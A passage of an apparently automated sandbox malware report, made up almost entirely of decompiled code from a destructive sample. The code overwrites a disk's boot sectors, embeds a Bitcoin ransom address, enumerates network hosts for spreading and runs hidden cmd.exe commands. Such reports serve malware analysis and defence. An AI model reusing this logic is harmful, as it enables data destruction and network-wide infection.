      • Part of subcall function 011E85D0: GetProcessHeap.KERNEL32(00000000,?,00000000,002F1C10,-00000004,000000C1,?,?,?,011E2121,000001BD,00000000,?,?,011E64AC,?), ref: 011E8665
      • Part of subcall function 011E85D0: HeapFree.KERNEL32(00000000), ref: 011E8668
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 84%
    			E011E777B(intOrPtr _a4) {
    				signed int _v8;
    				long _v12;
    				void* _v16;
    				struct HINSTANCE__* _v20;
    				short _v84;
    				void* __esi;
    				struct HINSTANCE__* _t20;
    				void* _t27;
    				signed int _t29;
    				void* _t41;
    				intOrPtr* _t45;
    				signed char* _t47;
    				void* _t50;
    				void* _t52;
    
    				_t41 = 0;
    				_t20 = LoadLibraryW(L"iphlpapi.dll");
    				_v20 = _t20;
    				if(_t20 != 0) {
    					_t45 = GetProcAddress(_t20, "GetExtendedTcpTable");
    					if(_t45 == 0) {
    						GetLastError();
    					} else {
    						_v12 = 0x100000;
    						_t27 = HeapAlloc(GetProcessHeap(), 8, 0x100000); // executed
    						_t50 = _t27;
    						_v16 = _t50;
    						if(_t50 != 0) {
    							_t29 =  *_t45(_t50,  &_v12, 0, 2, 1, 0); // executed
    							asm("sbb ebx, ebx");
    							_t41 =  ~_t29 + 1;
    							if(_t41 != 0) {
    								_v8 = _v8 & 0x00000000;
    								if( *_t50 > 0) {
    									_t7 = _t50 + 0x12; // 0x12
    									_t47 = _t7;
    									do {
    										if( *((intOrPtr*)(_t47 - 0xe)) == 5) {
    											wsprintfW( &_v84, L"%u.%u.%u.%u",  *(_t47 - 2) & 0x000000ff,  *(_t47 - 1) & 0x000000ff,  *_t47 & 0x000000ff, _t47[1] & 0x000000ff);
    											_t52 = _t52 + 0x18;
    											E011E6FC7( &_v84, 0, _a4);
    											_t50 = _v16;
    										}
    										_v8 = _v8 + 1;
    										_t47 =  &(_t47[0x14]);
    									} while (_v8 <  *_t50);
    								}
    							}
    							HeapFree(GetProcessHeap(), 0, _t50);
    						}
    					}
    					FreeLibrary(_v20);
    				}
    				return _t41;
    			}

    APIs
    • LoadLibraryW.KERNEL32(iphlpapi.dll), ref: 011E7789
    • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable,002E8160,00000000), ref: 011E77A2
    • GetProcessHeap.KERNEL32(00000008,00100000), ref: 011E77BD
    • RtlAllocateHeap.NTDLL(00000000), ref: 011E77C4
    • wsprintfW.USER32 ref: 011E781B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E7844
    • HeapFree.KERNEL32(00000000), ref: 011E784B
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011E7C7F), ref: 011E7853
    • FreeLibrary.KERNEL32(002E8160), ref: 011E785C
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 69%
    			E011E14A9(void* __ecx) {
    				void* _v8;
    				void* _v12;
    				signed int _v16;
    				unsigned int _v20;
    				void _v83;
    				void _v84;
    				void _v143;
    				char _v144;
    				void _v411;
    				char _v412;
    				void _v755;
    				char _v849;
    				void _v883;
    				char _v891;
    				void _v923;
    				char _v924;
    				char _v982;
    				char _v990;
    				short _v992;
    				intOrPtr _v996;
    				void _v1435;
    				void _v1436;
    				void _v1947;
    				void _v1948;
    				void _v2459;
    				void _v2460;
    				intOrPtr _t92;
    				int _t101;
    				void* _t103;
    				intOrPtr* _t110;
    				int _t111;
    				void* _t112;
    				void* _t114;
    				unsigned int _t118;
    				char* _t123;
    				void* _t129;
    				void* _t132;
    				void* _t135;
    				intOrPtr _t136;
    				void* _t144;
    				void* _t145;
    				void* _t146;
    				intOrPtr* _t147;
    				intOrPtr _t150;
    				void* _t157;
    				signed int _t159;
    				int _t160;
    				void* _t161;
    				signed int _t162;
    				void* _t163;
    				void* _t175;
    				void* _t178;
    				int _t179;
    				unsigned int _t185;
    				void* _t186;
    				void* _t187;
    				void* _t194;
    				void* _t195;
    				void* _t196;
    				void* _t197;
    
    				_t145 = __ecx;
    				_v412 = 0;
    				memset( &_v411, 0, 0x103);
    				_v1436 = 0;
    				memset( &_v1435, 0, 0x1ff);
    				_v924 = 0;
    				memset( &_v923, 0, 0x1ff);
    				_v2460 = 0;
    				memset( &_v2459, 0, 0x1ff);
    				_v1948 = 0;
    				memset( &_v1947, 0, 0x1ff);
    				_v144 = 0;
    				memset( &_v143, 0, 0x3b);
    				_v84 = 0;
    				memset( &_v83, 0, 0x3c);
    				_t194 = _t187 + 0x54;
    				_v16 = 0;
    				_t92 = E011E1038( &_v412); // executed
    				 *0x11ff8f8 = _t92;
    				if(_t92 >= 0) {
    					_t92 = E011E122D( &_v412,  &_v8); // executed
    					 *0x11ff8f8 = _t92;
    					if(_t92 >= 0) {
    						if(_v8 != 0) {
    							_t136 = 0x80070032;
    							L49:
    							 *0x11ff8f8 = _t136;
    							return _t136;
    						}
    						_t92 = E011E1424(_t145,  &_v144, 0x3c); // executed
    						 *0x11ff8f8 = _t92;
    						if(_t92 >= 0) {
    							_t146 = 0;
    							do {
    								_t162 = 0x3a;
    								_t159 = ( *(_t186 + _t146 - 0x8c) & 0x000000ff) % _t162;
    								_t146 = _t146 + 1;
    								_t27 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz" + _t159; // 0x34333231
    								 *((char*)(_t186 + _t146 - 0x51)) =  *_t27;
    							} while (_t146 < 0x3c);
    							_t92 = E011E12D5(_t146,  &_v412,  &_v1436); // executed
    							 *0x11ff8f8 = _t92;
    							if(_t92 >= 0) {
    								_t147 =  &_v982;
    								_t163 = 4;
    								_t160 = 0;
    								do {
    									_t101 =  *_t147;
    									if(_t101 != 0 && _t101 < 0xffffffff) {
    										_t160 = _t101;
    									}
    									_t147 = _t147 + 0x10;
    									_t163 = _t163 - 1;
    								} while (_t163 != 0);
    								if(_t160 == 0xffffffff) {
    									_t160 = 0;
    								}
    								if(_t160 <= 0x28) {
    									_t136 = 0x80070272;
    									goto L49;
    								}
    								memcpy( &_v1948,  &_v1436, 0x80 << 2);
    								_t195 = _t194 + 0xc;
    								_t103 = 0;
    								do {
    									 *(_t186 + _t103 - 0x798) =  *(_t186 + _t103 - 0x798) ^ 0x00000007;
    									_t103 = _t103 + 1;
    								} while (_t103 < 0x200);
    								memset( &_v2460, 7, 0x200);
    								_t196 = _t195 + 0xc;
    								_v924 = 0;
    								_t92 = E011E1424(0,  &_v923, 0x20);
    								 *0x11ff8f8 = _t92;
    								if(_t92 >= 0) {
    									_t92 = E011E1424(0,  &_v891, 8);
    									 *0x11ff8f8 = _t92;
    									if(_t92 >= 0) {
    										memcpy( &_v883, "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX", 0x22);
    										_t110 =  &_v84;
    										_t197 = _t196 + 0xc;
    										_v849 = 0;
    										_t47 = _t110 + 1; // 0x1
    										_t178 = _t47;
    										do {
    											_t150 =  *_t110;
    											_t110 = _t110 + 1;
    										} while (_t150 != 0);
    										_t111 = _t110 - _t178;
    										_t179 = _t111;
    										if(_t111 != 0) {
    											if(_t179 > 0x156) {
    												_t179 = 0x156;
    											}
    											memcpy( &_v755,  &_v84, _t179);
    											_t197 = _t197 + 0xc;
    											 *((char*)(_t186 + _t179 - 0x2ef)) = 0;
    										}
    										_t112 =  *0x11fb104(0x200);
    										_v12 = _t112;
    										if(_t112 != 0) {
    											memcpy(_t112, 0x11f8c50, 0x80 << 2);
    											_t197 = _t197 + 0xc;
    											_t92 = 0;
    										} else {
    											_t92 = 0x8007000e;
    										}
    										 *0x11ff8f8 = _t92;
    										if(_t92 >= 0) {
    											_t114 =  *0x11fb104(0x22b1);
    											_v8 = _t114;
    											if(_t114 != 0) {
    												_v16 = 0x22b1;
    												memcpy(_t114, 0x11f8e50, 0x22b1);
    												_t197 = _t197 + 0xc;
    												_t92 = 0;
    											} else {
    												_t92 = 0x8007000e;
    											}
    											 *0x11ff8f8 = _t92;
    											if(_t92 >= 0) {
    												_t118 = _v16 - (_v16 & 0x000001ff) + 0x400;
    												_v20 = _t118;
    												_t144 =  *0x11fb104(_t118);
    												if(_t144 == 0) {
    													_t136 = 0x8007000e;
    													goto L49;
    												}
    												memcpy(_t144, _v12, 0x80 << 2);
    												 *((intOrPtr*)(_t144 + 0x1b8)) = _v996;
    												 *((short*)(_t144 + 0x1bc)) = _v992;
    												_t123 =  &_v990;
    												_t65 = _t144 + 0x1be; // 0x1be
    												_t157 = _t65;
    												_t161 = 4;
    												do {
    													asm("movsd");
    													asm("movsd");
    													asm("movsd");
    													_t123 = _t123 + 0x10;
    													_t157 = _t157 + 0x10;
    													_t161 = _t161 - 1;
    													asm("movsd");
    												} while (_t161 != 0);
    												_t67 = _t144 + 0x200; // 0x200
    												memcpy(_t67, _v8, _v16);
    												_t185 = _v20 >> 9;
    												if(_t185 == 0) {
    													_t92 = 0x80070057;
    												} else {
    													_t175 = 0;
    													if(_t185 != 0) {
    														while(1) {
    															_t92 = E011E1384(_t175, _t157,  &_v412, _t144); // executed
    															if(_t92 < 0) {
    																goto L45;
    															}
    															_t175 = _t175 + 1;
    															_t144 = _t144 + 0x200;
    															if(_t175 < _t185) {
    																continue;
    															} else {
    															}
    															goto L45;
    														}
    													}
    												}
    												L45:
    												 *0x11ff8f8 = _t92;
    												if(_t92 >= 0) {
    													_push( &_v924);
    													_push( &_v412);
    													_t129 = 0x20; // executed
    													_t92 = E011E1384(_t129, _t157); // executed
    													 *0x11ff8f8 = _t92;
    													if(_t92 >= 0) {
    														_push( &_v2460);
    														_push( &_v412);
    														_t132 = 0x21; // executed
    														_t92 = E011E1384(_t132, _t157); // executed
    														 *0x11ff8f8 = _t92;
    														if(_t92 >= 0) {
    															_push( &_v1948);
    															_push( &_v412);
    															_t135 = 0x22; // executed
    															_t136 = E011E1384(_t135, _t157); // executed
    															goto L49;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _t92;
    			}

    APIs
    • memset.MSVCRT ref: 011E14CB
    • memset.MSVCRT ref: 011E14E8
    • memset.MSVCRT ref: 011E1500
    • memset.MSVCRT ref: 011E1518
    • memset.MSVCRT ref: 011E1530
    • memset.MSVCRT ref: 011E1549
    • memset.MSVCRT ref: 011E155C
      • Part of subcall function 011E1038: memset.MSVCRT ref: 011E105D
      • Part of subcall function 011E1038: memset.MSVCRT ref: 011E1071
      • Part of subcall function 011E1038: memset.MSVCRT ref: 011E10B9
      • Part of subcall function 011E1038: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 011E10E3
      • Part of subcall function 011E1038: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 011E10ED
      • Part of subcall function 011E1038: CreateFileA.KERNEL32(\\.\0:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 011E111F
      • Part of subcall function 011E1038: DeviceIoControl.KERNEL32(00000000,00560000,00000000,00000000,?,00000020,?,00000000), ref: 011E1140
      • Part of subcall function 011E1038: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000001FF), ref: 011E114A
      • Part of subcall function 011E1038: _itoa.MSVCRT ref: 011E116F
      • Part of subcall function 011E1038: memcpy.MSVCRT ref: 011E11CE
      • Part of subcall function 011E1038: memcpy.MSVCRT ref: 011E1208
      • Part of subcall function 011E1038: CloseHandle.KERNEL32(?), ref: 011E1216
      • Part of subcall function 011E122D: CreateFileA.KERNEL32(?,80100000,00000003,00000000,00000003,00000000,00000000), ref: 011E125B
      • Part of subcall function 011E122D: GetLastError.KERNEL32 ref: 011E1268
      • Part of subcall function 011E122D: DeviceIoControl.KERNEL32(00000000,00070048,00000000,00000000,?,00000090,00000000,00000000), ref: 011E1299
      • Part of subcall function 011E122D: GetLastError.KERNEL32 ref: 011E12A3
      • Part of subcall function 011E122D: CloseHandle.KERNEL32(00000000), ref: 011E12C7
      • Part of subcall function 011E1424: CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,000001FF,?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E143D
      • Part of subcall function 011E1424: GetLastError.KERNEL32(?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E1457
      • Part of subcall function 011E1424: CryptGenRandom.ADVAPI32(00000000,00000000,?,?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E1473
      • Part of subcall function 011E1424: GetLastError.KERNEL32(?,?,011E15BA,00000000,0000003C,00000000,?,00000000), ref: 011E147D
      • Part of subcall function 011E1424: CryptReleaseContext.ADVAPI32(00000000,00000000,00000000,0000003C,00000000,?), ref: 011E149A
      • Part of subcall function 011E12D5: memset.MSVCRT ref: 011E12FB
      • Part of subcall function 011E12D5: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 011E1312
      • Part of subcall function 011E12D5: GetLastError.KERNEL32 ref: 011E131F
      • Part of subcall function 011E12D5: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 011E1340
      • Part of subcall function 011E12D5: ReadFile.KERNEL32(00000000,00000200,00000200,00000000,00000000), ref: 011E1354
      • Part of subcall function 011E12D5: GetLastError.KERNEL32 ref: 011E135E
      • Part of subcall function 011E12D5: CloseHandle.KERNEL32(00000000), ref: 011E1375
    • memset.MSVCRT ref: 011E1670
    • memcpy.MSVCRT ref: 011E16C3
    • memcpy.MSVCRT ref: 011E16FC
    • memcpy.MSVCRT ref: 011E1762
    • memcpy.MSVCRT ref: 011E17F4
      • Part of subcall function 011E1384: CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 011E13AD
      • Part of subcall function 011E1384: GetLastError.KERNEL32(?,?,011E1852,00000000,00000000), ref: 011E13BA
      • Part of subcall function 011E1384: SetFilePointerEx.KERNEL32(00000000,00000020,00000000,00000000,00000000), ref: 011E13DC
      • Part of subcall function 011E1384: WriteFile.KERNEL32(00000000,011E1852,00000200,00000000,00000000), ref: 011E13F4
      • Part of subcall function 011E1384: GetLastError.KERNEL32(?,?,011E1852,00000000,00000000), ref: 011E13FE
      • Part of subcall function 011E1384: CloseHandle.KERNEL32(00000000), ref: 011E1415
    Strings
    • 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX, xrefs: 011E16BD
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E83BD(void* __eax, signed int _a4) {
    				struct _PROCESS_INFORMATION _v20;
    				struct _STARTUPINFOW _v88;
    				short _v1648;
    				short _v3696;
    				char* _t20;
    				char* _t21;
    				int _t26;
    				void* _t35;
    				long _t36;
    				long _t37;
    				int _t38;
    				void* _t39;
    
    				_t39 = __eax;
    				_t38 = 0;
    				wsprintfW( &_v3696, L"/c %ws", __eax);
    				 *((short*)(_t39 + 0x7fe)) = 0;
    				if(GetEnvironmentVariableW(L"ComSpec",  &_v1648, 0x30c) != 0 || GetSystemDirectoryW( &_v1648, 0x30c) != 0 && lstrcatW( &_v1648, L"\\cmd.exe") != 0) {
    					_t35 = 0x10;
    					_t20 =  &_v20;
    					do {
    						 *_t20 = 0;
    						_t20 = _t20 + 1;
    						_t35 = _t35 - 1;
    					} while (_t35 != 0);
    					_t36 = 0x44;
    					_t37 = _t36;
    					_t21 =  &_v88;
    					do {
    						 *_t21 = 0;
    						_t21 = _t21 + 1;
    						_t37 = _t37 - 1;
    					} while (_t37 != 0);
    					_v88.cb = _t36;
    					_t26 = CreateProcessW( &_v1648,  &_v3696, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20); // executed
    					_t38 = _t26;
    					if(_t38 != 0) {
    						Sleep(_a4 * 0x3e8); // executed
    					}
    					goto L9;
    				} else {
    					L9:
    					return _t38;
    				}
    			}

    APIs
    • wsprintfW.USER32 ref: 011E83DC
    • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 011E8400
    • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 011E8412
    • lstrcatW.KERNEL32(?,\cmd.exe), ref: 011E8428
    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E846F
    • Sleep.KERNELBASE(011E85C7), ref: 011E8485
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 94%
    			E011EA0FE() {
    				signed int _v8;
    				long _v12;
    				long _v16;
    				void _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				void* _v40;
    				void* _v44;
    				intOrPtr _t43;
    				unsigned int _t44;
    				signed int _t47;
    				void* _t54;
    				intOrPtr _t55;
    				signed int _t56;
    				signed int _t58;
    				void* _t63;
    				void* _t64;
    				void* _t65;
    				signed int _t67;
    				int _t75;
    				signed int _t79;
    				void* _t83;
    				void** _t85;
    				void* _t91;
    
    				_t43 =  *0x11ff140; // 0x2e8160
    				_v24 = _t43;
    				_t44 =  *0x11ff144; // 0x3
    				_t47 =  !(_t44 >> 2) & 0x00000001;
    				_v20 = _t47;
    				if(_t47 != 0) {
    					_push(0); // executed
    					E011E9F8E(); // executed
    				}
    				_v44 = _v44 & 0x00000000;
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t83 = HeapAlloc(GetProcessHeap(), 8, 8);
    				if(_t83 == 0) {
    					L27:
    					return 0;
    				} else {
    					 *_t83 = _v20;
    					_t54 = HeapAlloc(GetProcessHeap(), 8, 0x21);
    					 *(_t83 + 4) = _t54;
    					_t94 = _t54;
    					if(_t54 == 0) {
    						goto L27;
    					}
    					_t55 = E011E6F40(_v24, _t94, _t54);
    					_t75 = 0;
    					_v28 = _t55;
    					if(_t55 == 0) {
    						goto L27;
    					}
    					_v8 = 0;
    					_v16 = 0;
    					while(1) {
    						_v12 = _t75;
    						if(_v8 == 4) {
    							goto L10;
    						}
    						_t65 = CreateThread(_t75, _t75, E011EA073, _t83, _t75, _t75); // executed
    						if(_t65 == 0) {
    							L26:
    							E011E6F78(_v28);
    							goto L27;
    						}
    						 *(_t91 + _v8 * 4 - 0x28) = _t65;
    						_t75 = 0;
    						L11:
    						_t56 = 0;
    						while( *((intOrPtr*)(_t91 + _t56 * 4 - 0x28)) != _t75) {
    							_v12 = _v12 + 1;
    							_t56 = _t56 + 1;
    							if(_t56 != 4) {
    								continue;
    							}
    							break;
    						}
    						_t58 = WaitForMultipleObjects(_v12,  &_v44, _t75, _v16);
    						if(_t58 == 0xffffffff) {
    							goto L26;
    						}
    						if(_t58 != 0x102) {
    							__eflags = _t58 - _v12 - 1;
    							if(_t58 <= _v12 - 1) {
    								_t85 = _t91 + _t58 * 4 - 0x28;
    								_v8 = _t58;
    								CloseHandle( *_t85);
    								 *_t85 =  *_t85 & 0x00000000;
    								__eflags =  *_t85;
    							}
    							L23:
    							_t83 = HeapAlloc(GetProcessHeap(), 8, 8);
    							if(_t83 == 0) {
    								goto L26;
    							}
    							_t63 = HeapAlloc(GetProcessHeap(), 8, 0x21);
    							_t78 = _v20;
    							 *(_t83 + 4) = _t63;
    							 *_t83 = _v20;
    							if(_t63 == 0) {
    								goto L26;
    							}
    							_t64 = E011E6F02(_t78, _t63); // executed
    							if(_t64 != 0) {
    								_t75 = 0;
    								__eflags = 0;
    								continue;
    							}
    							goto L26;
    						}
    						_t79 = 4;
    						_v8 = _t79;
    						_t67 = 0;
    						while( *((intOrPtr*)(_t91 + _t67 * 4 - 0x28)) != 0) {
    							_t67 = _t67 + 1;
    							if(_t67 != _t79) {
    								continue;
    							}
    							goto L23;
    						}
    						_v8 = _t67;
    						goto L23;
    						L10:
    						_t18 =  &_v16;
    						 *_t18 = _v16 | 0xffffffff;
    						__eflags =  *_t18;
    						goto L11;
    					}
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 011EA13E
    • HeapAlloc.KERNEL32(00000000), ref: 011EA147
    • GetProcessHeap.KERNEL32(00000008,00000021), ref: 011EA15C
    • HeapAlloc.KERNEL32(00000000), ref: 011EA15F
    • CreateThread.KERNEL32(00000000,00000000,Function_0000A073,00000000,00000000,00000000), ref: 011EA1AB
    • WaitForMultipleObjects.KERNEL32(?,00000000,00000000,000000FF), ref: 011EA1E4
    • CloseHandle.KERNEL32(00000000), ref: 011EA222
    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 011EA22F
    • HeapAlloc.KERNEL32(00000000), ref: 011EA232
    • GetProcessHeap.KERNEL32(00000008,00000021), ref: 011EA23E
    • HeapAlloc.KERNEL32(00000000), ref: 011EA241
      • Part of subcall function 011E6F78: GetProcessHeap.KERNEL32(00000000,011E9F85,?,011E9F85,?), ref: 011E6F80
      • Part of subcall function 011E6F78: HeapFree.KERNEL32(00000000,?,011E9F85), ref: 011E6F87
      • Part of subcall function 011E9F8E: GetCurrentThread.KERNEL32(0000000B,00000001,?), ref: 011E9FA7
      • Part of subcall function 011E9F8E: OpenThreadToken.ADVAPI32(00000000), ref: 011E9FAE
      • Part of subcall function 011E9F8E: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 011E9FC9
      • Part of subcall function 011E9F8E: CloseHandle.KERNEL32(?), ref: 011EA05B
      • Part of subcall function 011E9F8E: CloseHandle.KERNEL32(?), ref: 011EA068
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 25%
    			E011E786B(intOrPtr _a4) {
    				long _v8;
    				long _v12;
    				void* _v16;
    				long _v20;
    				intOrPtr _v24;
    				short _v88;
    				void* __esi;
    				void* _t24;
    				void* _t29;
    				void* _t33;
    				void* _t44;
    				signed char* _t46;
    				long _t49;
    				intOrPtr* _t51;
    				void* _t54;
    
    				_t51 = __imp__GetIpNetTable;
    				_t49 = 0;
    				_v20 = 0;
    				_v8 = 0;
    				_t24 =  *_t51(0,  &_v8, 0); // executed
    				if(_t24 != 0xe8) {
    					if(_t24 != 0x7a) {
    						L15:
    						return _v20;
    					}
    					_t44 = HeapAlloc(GetProcessHeap(), 0, _v8);
    					_v16 = _t44;
    					if(_t44 == 0) {
    						L14:
    						goto L15;
    					}
    					_t29 =  *_t51(_t44,  &_v8, 0); // executed
    					if(_t29 != 0) {
    						L13:
    						HeapFree(GetProcessHeap(), _t49, _t44);
    						goto L14;
    					}
    					_v20 = 1;
    					_v12 = 0;
    					if( *_t44 <= 0) {
    						goto L13;
    					}
    					_v24 = 3;
    					_t46 = _t44 + 0x16;
    					do {
    						_push(4);
    						asm("repe cmpsb");
    						if(0 != 0) {
    							asm("sbb eax, eax");
    							asm("sbb eax, 0xffffffff");
    						}
    						if(0 == 0) {
    							wsprintfW( &_v88, L"%u.%u.%u.%u",  *(_t46 - 2) & 0x000000ff,  *(_t46 - 1) & 0x000000ff,  *_t46 & 0x000000ff, _t46[1] & 0x000000ff);
    							_t54 = _t54 + 0x18;
    							E011E6FC7( &_v88, 0, _a4);
    						}
    						_v12 = _v12 + 1;
    						_t33 = _v16;
    						_t46 =  &(_t46[0x18]);
    					} while (_v12 <  *_t33);
    					_t44 = _t33;
    					_t49 = 0;
    					goto L13;
    				}
    				return 0;
    			}

    APIs
    • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 011E7887
    • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 011E78A5
    • HeapAlloc.KERNEL32(00000000), ref: 011E78AC
    • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 011E78C5
    • wsprintfW.USER32 ref: 011E7917
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E7943
    • HeapFree.KERNEL32(00000000), ref: 011E794A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 74%
    			E011E5A7E(signed int* __ecx, void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
    				signed int _v5;
    				signed int _v12;
    				signed int _v13;
    				char _v17;
    				char _v20;
    				signed int _v21;
    				signed int _v24;
    				char _v25;
    				char _v28;
    				char _v29;
    				char _v32;
    				char _v33;
    				signed int _v36;
    				intOrPtr _v37;
    				signed int _v40;
    				intOrPtr _v41;
    				signed int _v44;
    				signed int _v45;
    				char _v48;
    				intOrPtr _v49;
    				signed int _v52;
    				intOrPtr _v53;
    				char _v54;
    				signed int _v56;
    				char _v57;
    				char _v60;
    				intOrPtr _v61;
    				signed int _v64;
    				intOrPtr _v65;
    				signed int _v68;
    				int _v72;
    				intOrPtr _v73;
    				signed int _v76;
    				char _v80;
    				signed int _v84;
    				intOrPtr _v88;
    				void* _v92;
    				intOrPtr _v96;
    				intOrPtr _v100;
    				intOrPtr _v104;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t369;
    				signed short _t370;
    				signed short _t371;
    				signed int _t374;
    				signed int _t386;
    				signed int _t389;
    				signed int _t391;
    				signed int _t395;
    				signed int _t398;
    				signed int _t400;
    				signed int _t401;
    				void* _t402;
    				intOrPtr* _t406;
    				signed int _t416;
    				signed int _t420;
    				void* _t424;
    				signed int _t427;
    				signed short _t428;
    				signed int _t430;
    				signed int _t434;
    				signed int _t435;
    				signed int _t436;
    				signed int _t437;
    				signed int _t440;
    				signed int _t441;
    				signed int _t444;
    				signed int _t447;
    				signed int _t450;
    				signed int _t452;
    				signed int _t454;
    				signed int _t459;
    				signed int _t461;
    				signed int _t463;
    				signed int _t465;
    				signed int _t467;
    				signed int _t469;
    				signed int _t471;
    				signed int _t473;
    				signed int _t475;
    				signed int _t477;
    				signed int _t479;
    				signed int _t481;
    				signed int _t483;
    				signed int _t485;
    				signed int _t487;
    				signed int _t489;
    				signed int _t491;
    				signed int _t493;
    				signed int _t495;
    				signed int _t497;
    				signed int _t499;
    				signed int _t501;
    				signed int _t503;
    				signed int _t505;
    				signed int _t507;
    				signed int _t509;
    				signed int _t511;
    				signed int _t513;
    				signed int _t515;
    				signed int _t520;
    				signed int _t521;
    				signed int _t523;
    				signed int _t525;
    				signed int _t527;
    				signed int _t529;
    				signed int _t531;
    				signed int _t533;
    				signed int _t535;
    				signed int _t537;
    				signed int _t539;
    				signed int _t541;
    				signed int _t542;
    				signed int _t544;
    				signed int _t545;
    				signed int _t548;
    				signed int _t550;
    				intOrPtr* _t557;
    				char _t561;
    				intOrPtr _t564;
    				signed int _t567;
    				signed int _t572;
    				void* _t579;
    				void* _t586;
    				signed int _t606;
    				intOrPtr _t607;
    				intOrPtr _t608;
    				intOrPtr _t609;
    				signed int _t611;
    				void* _t618;
    				int _t620;
    				char* _t621;
    				signed int _t624;
    				intOrPtr _t628;
    				intOrPtr* _t635;
    
    				_t568 = __ecx;
    				while(1) {
    					_v57 = 0;
    					_t369 = E011E6727( &_a4,  &_v57,  &_a4, _a8, _a12); // executed
    					if(_t369 != 0) {
    						break;
    					}
    					_t370 = E011E20B2();
    					_t611 = 0;
    					_v40 = _t370 & 0x0000ffff;
    					_v44 = 0xfeff;
    					_v48 = 0;
    					_v56 = 0;
    					_t371 = E011E20B2();
    					_t557 = _a4;
    					_v52 = _t371 & 0x0000ffff;
